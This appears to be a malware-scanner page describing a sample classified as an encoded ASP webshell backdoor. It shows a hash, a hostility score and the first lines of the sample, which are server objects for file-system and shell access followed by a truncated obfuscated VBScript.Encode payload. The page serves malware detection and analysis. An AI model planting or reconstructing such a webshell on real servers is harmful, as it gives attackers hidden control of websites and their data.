Hostile 92% Download

Backdoor.ASP.Ace.bh

Encoded ASP webshell backdoor

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious stringClassic ASP VBScript.Encode language directive
SHA-256cf1f2153db6438b65ce8c8a8e4f985d9c1011d52b6e43cffbe5c03c7b5747b75
MaleculeO(C)Th

Evidence

Classic ASP VBScript.Encode language directive lines 1–5
1<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
2<object runat="server" id="net" scope="page" classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
3<object runat="server" id="net" scope="page" classid="clsid:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B"></object>
4<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
5<%#@~^IRgAAA==@#@&dGaYbWx,+X2VbmrY@#@&@#@&imW dY,:'raa6X6r@#@&d^G /OPs#+M/rG 'J* Z!E@#@&71WUkY,E/DhC/khGD9'Eqy&&yqJ,B��¼����@#@&7^W /DPCNhr nC/kAWMNxEO!*qfrPv��������@#@&71WUkY,/;^HmaSKW2q{FTT@#@&d1GxkYPk4nV^?DDxJj4VsJ@#@&d1WUdDPhd^Mk2YUOM'Eq/1DkaYr@#@&imGxkY …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.